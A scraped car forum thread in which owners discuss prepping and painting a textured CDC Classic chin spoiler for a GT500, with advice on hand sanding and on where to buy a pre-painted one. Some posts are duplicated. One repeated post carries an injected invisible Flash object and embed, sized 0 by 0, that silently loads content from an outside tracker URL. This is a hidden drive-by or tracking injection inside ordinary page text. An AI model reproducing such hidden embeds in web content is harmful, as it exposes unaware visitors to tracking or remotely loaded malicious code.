Unpainted CDC Chin Spoiler

I braught my GT500 spoiler and CDC Classic chin spoiler to my painter and he said that the bumps/rough texture on the CDC chin spoiler would show through.

Has anyone painted over this, or should I go with a "painted" one from Steeda. Which I would assume is primed. Is it made of a different material/made differently - more smooth?

Anyway, I would imagine he could prime the crap out of it, then sand down the primer till its smooth, then paint it.

Then again, I have no experience with paint.

Any info would be much help!

Thanks.

• Sponsors (?)

Have you contacted the guys at CDC and asked for advice? I have talked to their technical people (email) on several occassions and they were very helpful and realize we as consumers often alter their products to suit.

Which spoiler did you get? When mine was new it was ready to be primed and painted and was a beige plastic color. But they may have changed how they are made. I know you don't like my aggressive so I assume you got the "Classic" and I have seen a lot of those painted a color or black or colored with a black center.

Good luck with your project.

While CDC does sell one untextured and ready for paint, any good body shop should be able to paint the texturized one. It just take extra prep, as the texture would need sanded off. So yes, it can be done. Just like painting the stock mirrors.

Interesting, I baught mine from American Muscle...it came textured, black ABS plastic. Really flimsy.

Anyway, the guy that is doing the painting said he could not sand this texture because it would melt the plastic? :shrug: I would imagine a nice hand sand would not cause that.

I will have to send it back and order from CDC directly.

Interesting, I baught mine from American Muscle...it came textured, black ABS plastic. Really flimsy.

Anyway, the guy that is doing the painting said he could not sand this texture because it would melt the plastic? :shrug: I would imagine a nice hand sand would not cause that.

I will have to send it back and order from CDC directly.

Sounds almost like he doesn't want to mess with it. I'm sure sanding with a DA could melt it but I agree hand sanding probably wouldn't cause any harm. I'm assuming you are paying him to paint it and this being such a small piece he doesn't want to spend a bunch of time prepping it.

Yeah, you totally have to hand sand something like that. Wouldn't trust anyone who thought of using a machine on it. CDC seems to only sell the textured version now, however, they say it can be smoothed and painted. AtlantaAuto.com is having a sale right now. They're selling it painted for $299. That's where my GT500 spoiler came from, and the paint match is perfect.

While CDC does sell one untextured and ready for paint, any good body shop should be able to paint the texturized one. It just take extra prep, as the texture would need sanded off. So yes, it can be done. Just like painting the stock mirrors.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Right, I got my classic CDC painted and it looks fine...Ill try and take some pics today. A good body shop should have no problems painting it...

Yeah, you totally have to hand sand something like that. Wouldn't trust anyone who thought of using a machine on it. CDC seems to only sell the textured version now, however, they say it can be smoothed and painted. AtlantaAuto.com is having a sale right now. They're selling it painted for $299. That's where my GT500 spoiler came from, and the paint match is perfect.

I got my painted CDC chin spoiler from them over a year ago. Paint looked great. I was pleased.